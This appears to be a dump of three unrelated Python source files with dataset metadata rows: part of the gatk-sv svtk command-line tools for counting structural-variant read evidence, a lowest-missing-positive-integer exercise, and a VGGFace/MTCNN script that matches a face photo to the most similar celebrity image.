header = 'name log_pval called_median bg_median bg_frac'.split()
args.fout.write('\t'.join(header) + '\n')
if args.samples is not None:
whitelist = [s.strip() for s in args.samples.readlines()]
else:
whitelist = None
if args.index is not None:
discfile = pysam.TabixFile(args.disc, index=args.index)
else:
if args.disc.startswith('http'):
raise Exception('Must provide tabix index with remote URL')
discfile = pysam.TabixFile(args.disc)
if args.medianfile is not None:
medians = pd.read_table(args.medianfile)
medians = pd.melt(medians, var_name='sample', value_name='median_cov')
else:
medians = None
runner = PETestRunner(vcf, discfile, fout, args.background, args.common,
args.window_in, args.window_out, whitelist, medians=medians, log=args.log)
runner.run()
def count_pe(argv):
parser = argparse.ArgumentParser(
description="Count discordant pairs supporting a SV breakpoints.",
prog='svtk count-pe',
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('vcf', help='Variants.')
parser.add_argument('disc', help='Table of discordant pair coordinates.')
parser.add_argument('fout', type=argparse.FileType('w'),
help='Output table of PE counts.')
parser.add_argument('-o', '--window-out', type=int, default=500,
help='Window outside breakpoint to query for '
'discordant pairs. [500]')
parser.add_argument('-i', '--window-in', type=int, default=50,
help='Window inside breakpoint to query for '
'discordant pairs. [50]')
parser.add_argument('--common', default=False,
action='store_true', help='Ignore background for common AF')
parser.add_argument('-s', '--samples', type=argparse.FileType('r'),
default=None,
help='Whitelist of samples to restrict testing to.')
parser.add_argument('--index', default=None,
help='Tabix index of discordant pair file. Required if '
'discordant pair file is hosted remotely.')
parser.add_argument('--medianfile', default=None,
help='Median coverage statistics for each library '
'(optional). If provided, each sample\'s split '
'counts will be normalized accordingly. '
'Same format as RdTest, one column per sample.')
if len(argv) == 0:
parser.print_help()
sys.exit(1)
args = parser.parse_args(argv)
if args.vcf in '- stdin'.split():
vcf = pysam.VariantFile(sys.stdin)
else:
vcf = pysam.VariantFile(args.vcf)
if args.fout in '- stdout'.split():
fout = sys.stdout
else:
fout = args.fout
header = 'name sample count'.split()
args.fout.write('\t'.join(header) + '\n')
if args.samples is not None:
whitelist = [s.strip() for s in args.samples.readlines()]
else:
whitelist = [s for s in vcf.header.samples]
if args.index is not None:
discfile = pysam.TabixFile(args.disc, index=args.index)
else:
if args.disc.startswith('http'):
raise Exception('Must provide tabix index with remote URL')
discfile = pysam.TabixFile(args.disc)
if args.medianfile is not None:
medians = pd.read_table(args.medianfile)
medians = pd.melt(medians, var_name='sample', value_name='median_cov')
else:
medians = None
petest = PETest(discfile, args.common, args.window_in,
args.window_out, medians=medians)
for record in vcf:
counts = petest.load_counts(record, args.window_in, args.window_out)
counts = petest.normalize_counts(counts)
counts = counts.set_index('sample')
counts = counts.reindex(whitelist).fillna(0).astype(int)
counts = counts.reset_index()
counts['name'] = record.id
cols = 'name sample count'.split()
for row in counts[cols].as_matrix():
fout.write('\t'.join([str(x) for x in row]) + '\n')
# counts[cols].to_csv(fout, header=False, index=False, sep='\t', na_rep='NA')
def count_sr(argv):
parser = argparse.ArgumentParser(
description="Count clipped reads at SV breakpoints. Unwindowed.",
prog='svtk count-sr',
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('vcf',
help='VCF of variant calls. Standardized to include '
'CHR2, END, SVTYPE, STRANDS in INFO.')
parser.add_argument('countfile', help='Tabix indexed file of split counts.'
' Columns: chrom,pos,clip,count,sample')
parser.add_argument('fout',
help='Output table of split read counts.')
parser.add_argument('--common', default=False,
action='store_true', help='Ignore background for common AF')
parser.add_argument('-s', '--samples', type=argparse.FileType('r'),
default=None,
help='Whitelist of samples to restrict testing to.')
parser.add_argument('--index', default=None,
help='Tabix index of discordant pair file. Required if '
'discordant pair file is hosted remotely.')
# TODO: add normalization
parser.add_argument('--medianfile', default=None,
help='Median coverage statistics for each library '
'(optional). If provided, each sample\'s split '
'counts will be normalized accordingly. '
'Same format as RdTest, one column per sample.')
# Print help if no arguments specified
if len(argv) == 0:
parser.print_help()
sys.exit(1)
args = parser.parse_args(argv)
vcf = pysam.VariantFile(args.vcf)
if args.index is not None:
countfile = pysam.TabixFile(args.countfile, index=args.index,
parser=pysam.asTuple())
else:
if args.countfile.startswith('http'):
raise Exception('Must provide tabix index with remote URL')
countfile = pysam.TabixFile(args.countfile, parser=pysam.asTuple())
if args.fout in '- stdout'.split():
fout = sys.stdout
else:
fout = open(args.fout, 'w')
header = 'name coord sample count'.split()
fout.write('\t'.join(header) + '\n')
if args.samples is not None:
whitelist = [s.strip() for s in args.samples.readlines()]
else:
whitelist = [s for s in vcf.header.samples]
if args.medianfile is not None:
medians = pd.read_table(args.medianfile)
medians = pd.melt(medians, var_name='sample', value_name='median_cov')
else:
medians = None
srtest = SRTest(countfile, args.common, window=0, medians=medians)
for record in vcf:
for coord in 'start end'.split():
if coord == 'start':
pos, strand, chrom = record.pos, record.info['STRANDS'][0], record.chrom
else:
# TODO: With a properly formatted VCF, should be using END2 instead of END here
pos, strand, chrom = record.stop, record.info['STRANDS'][1], record.info['CHR2']
counts = srtest.load_counts(chrom, pos, strand)
counts = srtest.normalize_counts(counts)
counts = counts['sample count'.split()]
counts = counts.set_index('sample')
counts = counts.reindex(whitelist).fillna(0).astype(int)
counts = counts.reset_index()
counts['name'] = record.id
counts['coord'] = coord
for row in counts[header].values:
fout.write('\t'.join([str(x) for x in row]) + '\n')
# counts[header].to_csv(fout, header=False, index=False, sep='\t', na_rep='NA')
| 42.688623 | 100 | 0.591948 | [
"BSD-3-Clause"
] | VJalili/gatk-sv | src/svtk/svtk/cli/pesr_test.py | 14,259 | Python |
#!/usr/bin/python3
def lowestPositiveInt(A):
A.sort()
index = -1
try:
index = A.index(1)
except ValueError:
return 1
# Remove all negatives and zero if 1 is found
# if index >= 0:
A = A[index:]
length = len(A)
i = 1
found = 0
while i < length and found == 0:
if A[i] > (A[i-1]+1):
found = A[i-1]+1
i = i+1
if found > 0:
return found
else:
return A[length-1]+1
def main():
sample1 = [-1, -3, -47, -10, 0, 27, 27, 0, 1, 1]
sample2 = [0, 1, 2, 3, 7, 25, -12, -14, -17, 4, 4]
sample3 = [1, 1, 5, 27, -100, -234, 3, 2, 3, 4, 4]
print("Sample 1: {}".format(lowestPositiveInt(sample1)))
print("Sample 2: {}".format(lowestPositiveInt(sample2)))
print("Sample 3: {}".format(lowestPositiveInt(sample3)))
main()
| 20.72093 | 61 | 0.485971 | [
"MIT"
] | gustavoromerobenitez/python-playground | codingTestIterative.py | 891 | Python |
from keras_vggface.utils import preprocess_input
from keras_vggface.vggface import VGGFace
import numpy as np
import pickle
from sklearn.metrics.pairwise import cosine_similarity
import cv2
from mtcnn import MTCNN
from PIL import Image
feature_list = np.array(pickle.load(open('artifacts/extracted_features/embedding.pkl','rb')))
filenames = pickle.load(open('artifacts/pickle_format_data/img_PICKLE_file.pkl','rb'))
model = VGGFace(model='resnet50',include_top=False,input_shape=(224,224,3),pooling='avg')
#detect face
detector = MTCNN()
# load img -> face detection
sample_img = cv2.imread('samples/saif_dup.jpg')
results = detector.detect_faces(sample_img)
x,y,width,height = results[0]['box']
face = sample_img[y:y+height,x:x+width]
# extract its features
image = Image.fromarray(face)
image = image.resize((224,224))
face_array = np.asarray(image)
face_array = face_array.astype('float32')
expanded_img = np.expand_dims(face_array,axis=0)
preprocessed_img = preprocess_input(expanded_img)
result = model.predict(preprocessed_img).flatten()
# print(result)
# print(result.shape)
# print(result.reshape(1,-1))
# find the cosine distance of current image with all the 8664 features
similarity = []
for i in range(len(feature_list)):
similarity.append(cosine_similarity(result.reshape(1,-1),feature_list[i].reshape(1,-1))[0][0])
# print(len(similarity))
index_pos = sorted(list(enumerate(similarity)),reverse=True,key=lambda x:x[1])[0][0]
#recommend that image
temp_img = cv2.imread(filenames[index_pos])
cv2.imshow('output',temp_img)
cv2.waitKey(0)
| 28.563636 | 98 | 0.771483 | [
"MIT"
] | entbappy/Which-Bollywood-Celebrity-You-look-like | src/testing.py | 1,571 | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.